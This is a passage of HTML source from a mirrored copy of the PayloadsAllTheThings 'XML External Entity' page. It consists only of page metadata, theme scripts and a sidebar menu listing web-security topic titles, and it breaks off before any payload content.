ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
8130dc7c4b
PayloadsAllTheThings/XXE Injection/index.html

7075 lines
196 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/XXE%20Injection/">
<link rel="prev" href="../XSS%20Injection/5%20-%20XSS%20in%20Angular/">
<link rel="next" href="../Zip%20Slip/">
<link rel="icon" href="../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.47">
<title>XML External Entity - Payloads All The Things</title>
<link rel="stylesheet" href="../assets/stylesheets/main.6f8fc17f.min.css">
<link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
<style>
.social-container {
float: right;
}
</style>
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../custom.css">
<script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website" >
<meta property="og:title" content="XML External Entity - Payloads All The Things" >
<meta property="og:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta property="og:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/XXE Injection/README.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/PayloadsAllTheThings/XXE%20Injection/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="XML External Entity - Payloads All The Things" >
<meta name="twitter:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/XXE Injection/README.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#xml-external-entity" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href=".." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
XML External Entity
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href=".." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href=".." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
<label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_3">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key and Token Leaks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/IIS-Machine-Keys/" class="md-nav__link">
<span class="md-ellipsis">
IIS Machine Keys
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Account%20Takeover/mfa-bypass/" class="md-nav__link">
<span class="md-ellipsis">
MFA Bypasses
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
Client Side Path Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Client%20Side%20Path%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
Cross Site Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
Cross Site Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Cross-Site%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
DOM Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
DOM Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DOM%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
DOM Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
Denial of Service
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
Denial of Service
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Denial%20of%20Service/" class="md-nav__link">
<span class="md-ellipsis">
Denial of Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../File%20Inclusion/LFI-to-RCE/" class="md-nav__link">
<span class="md-ellipsis">
LFI to RCE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../File%20Inclusion/Wrappers/" class="md-nav__link">
<span class="md-ellipsis">
Inclusion Using Wrappers
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
